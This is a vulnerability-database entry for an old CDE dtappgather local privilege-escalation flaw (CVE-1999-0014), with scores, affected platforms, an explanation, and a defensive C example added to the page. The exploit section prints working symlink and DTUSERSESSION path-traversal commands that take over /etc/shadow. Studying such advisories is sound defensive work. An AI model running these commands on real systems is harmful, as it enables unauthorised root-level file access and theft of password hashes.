CVE-1999-0014
CVSS 7.2
Published: 1998-01-21 00:00:00
Modified: 2008-09-09 08:33:32

[Original] Unauthorized privileged access or denial of service via dtappgather program in CDE.


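[CNNVD] CDE dtappgather program unauthorized access and denial of service vulnerability (CNNVD-199801-017)

        The dtappgather program in CDE contains a vulnerability that leads to unauthorized privileged access or denial of service.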

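- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause a complete shutdown of the system]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]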

- CPE (affected platforms and products)

cpe:/a:cde:cde:1.2
cpe:/a:cde:cde:1.02_x86
cpe:/a:cde:cde:1.2_x86
cpe:/o:hp:hp-ux:11.00    HP-UX 11.00
cpe:/o:hp:hp-ux:10.10    HP HP-UX 10.10
cpe:/a:cde:cde:1.01_x86
cpe:/a:cde:cde:1.01
cpe:/o:ibm:aix:4.3    IBM AIX 4.3
cpe:/o:ibm:aix:4.1    IBM AIX 4.1
cpe:/a:cde:cde:1.02
cpe:/o:ibm:aix:4.2    IBM AIX 4.2
cpe:/o:hp:hp-ux:10.20    HP HP-UX 10.20
cpe:/o:hp:vvos:10.24    HP VVOS 10.24

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0014
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0014
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199801-017
(Official data source) CNNVD

- Other links and resources

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9801-075
(UNKNOWN)  HP  HPSBUX9801-075
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/185
(UNKNOWN)  SUN  00185

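- Vulnerability information

CDE dtappgather program unauthorized access and denial of service vulnerability
High risk    Unknown
1998-01-21 00:00:00 2005-05-02 00:00:00
Local
        The dtappgather program in CDE contains a vulnerability that leads to unauthorized privileged access or denial of service.

- Advisories and patches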

- Vulnerability information (19108)

HP HP-UX 10.20/11.0,IBM AIX <= 4.3,SCO Unixware 7.0,Sun Solaris <= 2.6 (EDBID:19108)
unix local
1999-11-03 Verified
0 Mastoras
N/A
source: http://www.securityfocus.com/bid/131/info

Due to improper checking of ownership, the dtappgather utility shipped with the Common Desktop Environment allows arbitrary users to overwrite any file present on the filesystem, regardless of the owner of the file. 

dtappgather uses a directory with permissions 0777 to create temporary files used by each login session. It does not check whether /var/dt/appconfig/appmanager/generic-display-0 already exists before opening it, so if a user creates a symbolic link from this path to another file on the filesystem, the permissions of that file are changed to 0666.

An additional bug exists whereby dtappgather blindly uses the contents of the DTUSERSESSION environment variable. By setting this variable to point to a file on the filesystem, that file's permissions can also be changed. Because the operation takes place relative to the /var/dt/appconfig directory, a series of '..' components is required to reach the root directory, after which any file can be altered.

% ls -l /etc/shadow
-r--r--r-- 1 root other 1500 Dec 29 18:21 /etc/shadow
% ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0
% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
% ls -l /etc/shadow
-r-xr-xr-x 1 user users 1500 Dec 29 18:21 /etc/shadow
---------------------------------------------
$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow		
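
A defensive counterpart to the two bugs described above, as an added example that is not taken from the advisory or from CDE: the session name is restricted to a single path component, and the mode change goes through a descriptor opened with O_NOFOLLOW instead of a path. The function names and the scratch directory under /tmp are assumptions made for the illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* A session name must be one path component: no '/', not "." or "..". */
int session_name_ok(const char *name)
{
    return name != NULL && name[0] != '\0' && strchr(name, '/') == NULL &&
           strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

/* Hypothetical helper: create or reuse the directory, chmod via descriptor. */
int make_session_dir(int base_fd, const char *name, mode_t mode)
{
    struct stat st;
    int fd, ok;
    if (!session_name_ok(name) ||
        (mkdirat(base_fd, name, 0700) != 0 && errno != EEXIST))
        return -1;
    fd = openat(base_fd, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                  /* planted symlink or non-directory */
    ok = fstat(fd, &st) == 0 && st.st_uid == geteuid() && fchmod(fd, mode) == 0;
    close(fd);
    return ok ? 0 : -1;
}

/* Constructed scenario: returns 1 when the planted link is refused, the
 * target keeps mode 0400, and a fresh name still works. */
int demo_symlink_refused(void)
{
    char base[] = "/tmp/dtdemoXXXXXX";
    struct stat st;
    int base_fd, fd, bad, good;
    if (mkdtemp(base) == NULL || (base_fd = open(base, O_RDONLY | O_DIRECTORY)) < 0)
        return -1;
    if ((fd = openat(base_fd, "target", O_CREAT | O_WRONLY, 0400)) < 0 ||
        close(fd) != 0 || symlinkat("target", base_fd, "generic-display-0") != 0)
        return -1;
    bad = make_session_dir(base_fd, "generic-display-0", 0755);
    good = make_session_dir(base_fd, "fresh-session", 0755);
    return fstatat(base_fd, "target", &st, 0) == 0 && bad == -1 && good == 0 &&
           (st.st_mode & 0777) == 0400;
}

int main(void) { return demo_symlink_refused() == 1 ? 0 : 1; }
```

The program exits with status 0 when the planted link is refused; it leaves its scratch directory under /tmp for inspection.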

- Vulnerability information

11648
CDE dtappgather Symlink Privilege Escalation
Local Access Required Race Condition

- Vulnerability description

Unknown or Incomplete

- Timeline

1998-01-21 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete